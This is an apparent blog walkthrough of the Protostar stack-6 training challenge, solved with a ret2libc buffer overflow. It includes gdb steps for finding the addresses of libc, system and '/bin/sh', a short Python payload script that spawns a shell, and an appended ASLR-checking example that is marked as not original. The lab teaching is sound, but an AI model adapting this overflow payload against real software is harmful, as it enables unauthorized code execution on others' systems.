PROTOSTAR WALKTHROUGH STACK-6

Prof.bubs
Dec 23, 2021

Hello hackers! Hope you are all doing well. It’s been a while since I posted something on my Medium page. So without wasting any more of our precious time, let us jump straight into hacking.

https://exploit.education/protostar/stack-six/

This particular challenge can be solved in multiple ways, but the method I am about to adopt is ret2libc.

So first off…What is libc????

Well, libc is the C standard library. It contains all the functions that a C program needs. For most of the programs that are coded these days, the libc library is not involved at all because it is quite vulnerable.

Now you may wonder... how could a library full of C functions possibly be exploited?

How is it vulnerable?

There is a particular function in libc that we are PaRtIcUlArLy interested in ( ಠ◡ಠ ). It's called the system function. This function runs whatever command string it is given, so calling it with "/bin/sh" pops open a shell. We will basically be crafting our payload so that the program returns into libc and executes system("/bin/sh").

https://www.youtube.com/watch?v=FvQYGAM1X9U&t=483s

As the diagram suggests, first we call the system function, and then at a 4-byte offset we have our /bin/sh.

ENOUGH LECTURE! IT’S BOOORING….. let's start hamking!

/opt/protostar/bin/stack6

Okay, it's time to assemble our avengers (addresses).

First things first, let's find our exact offset.

char buffer[64];
unsigned int ret;

From the program, we understand that we have about 4 bytes of ret on top of the stack, then 64 bytes of buffer space to overcome, and then 4 bytes to overcome ebp. Now, all we have to find is the exact amount of padding that we need. After some trial and error, I found out that it's about 8 bytes.

So we have 4+64+4+8=80 bytes to reach the eip region. Now, all we have to do is find our system and bin_sh. These are the commands and methods to be followed:

First, open gdb, break at main, and then run the program once. Once the program is finished running, we can see libc dynamically linked into our program’s process with the following command:

info proc mapping

On to finding our /bin/sh inside libc. We can do so with the following command line: (strings -a -t x 'starting name of libc.so') | grep '/bin/sh', which in our case would look like this:

(strings -a -t x /lib/libc-2.11.2.so) | grep '/bin/sh'

Now we have to add the first (base) address of libc from the mapping and the offset we received with the help of strings.

AND VOILA!! We have our /bin/sh address from libc. One more address is needed to solve our puzzle, which is the address of system. It is soo simple to find; all we have to do is:

p system

It's time to put all these pieces together.

EXPLOITATION

Like I said earlier, our payload must contain enough padding to get to the eip region and then return to libc, call the system function, and pop open a shell using /bin/sh.

Putting all this together in a Python file called xpl.py, we get this:

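# xpl.py (Python 2 syntax)
padding = 'A' * 80              # filler up to the saved return address
system = '\xb0\xff\xec\xb7'     # address of system() in libc, little-endian
ret = 'C' * 4                   # placeholder return address for system()
sh = '\xbf\x63\xfb\xb7'         # address of "/bin/sh" inside libc, little-endian
print padding + system + ret + sh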
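
The addresses hard-coded in xpl.py are only valid while libc loads at the same base on every run, which address space layout randomization (ASLR) is designed to prevent. The following added example (not part of the original write-up) parses constructed /proc/<pid>/maps excerpts and checks whether the `system` address from xpl.py would still point into libc on a second run; the mapping addresses and all function names are assumptions made for the example.

```python
import re

# Constructed /proc/<pid>/maps excerpts; the mapping addresses are sample values.
RUN_1 = """\
08048000-08049000 r-xp 00000000 00:10 2274 /opt/protostar/bin/stack6
b7e97000-b7fd5000 r-xp 00000000 00:10 759 /lib/libc-2.11.2.so
b7fd5000-b7fd6000 ---p 0013e000 00:10 759 /lib/libc-2.11.2.so
"""
RUN_2_NO_ASLR = RUN_1  # same layout on the next run
RUN_2_ASLR = """\
08048000-08049000 r-xp 00000000 00:10 2274 /opt/protostar/bin/stack6
b75c2000-b7700000 r-xp 00000000 00:10 759 /lib/libc-2.11.2.so
b7700000-b7701000 ---p 0013e000 00:10 759 /lib/libc-2.11.2.so
"""
SYSTEM_ADDR = 0xb7ecffb0  # the little-endian `system` bytes from xpl.py

MAP_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+\S+\s+\d+\s*(.*)$")

def parse_maps(text):
    """Return [(start, end, perms, file_offset, path)] for each mapping line."""
    rows = []
    for line in text.splitlines():
        m = MAP_LINE.match(line.strip())
        if m:
            rows.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3),
                         int(m.group(4), 16), m.group(5)))
    return rows

def libc_base(text):
    """libc's load address: the start of its mapping with file offset 0."""
    for start, _end, _perms, offset, path in parse_maps(text):
        if re.search(r"/libc[-.][^/]*$", path) and offset == 0:
            return start
    return None

def address_in_libc_code(addr, text):
    """True if addr falls inside an executable libc mapping in this run."""
    return any(start <= addr < end and "x" in perms and "/libc" in path
               for start, end, perms, _off, path in parse_maps(text))

def fixed_address_survives(addr, run_a, run_b):
    """A hard-coded address is reusable only if libc loads at the same base twice."""
    same_base = libc_base(run_a) == libc_base(run_b)
    return same_base and address_in_libc_code(addr, run_b)

if __name__ == "__main__":
    for name, run in (("no ASLR", RUN_2_NO_ASLR), ("ASLR", RUN_2_ASLR)):
        print(name, hex(libc_base(run)), fixed_address_survives(SYSTEM_ADDR, RUN_1, run))
```

On a live Linux host the same functions can be fed the contents of /proc/self/maps from two separate processes, and /proc/sys/kernel/randomize_va_space shows whether randomization is enabled at all.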

And that’s it, folks: we have got our shell. Hope you gained some bit of knowledge and understanding from this write-up. If you did, please do consider liking my write-ups, and if not… still consider liking it, pleeeeeeaseeee.

Goodbye and happy hacking( ◜◒◝ )♡
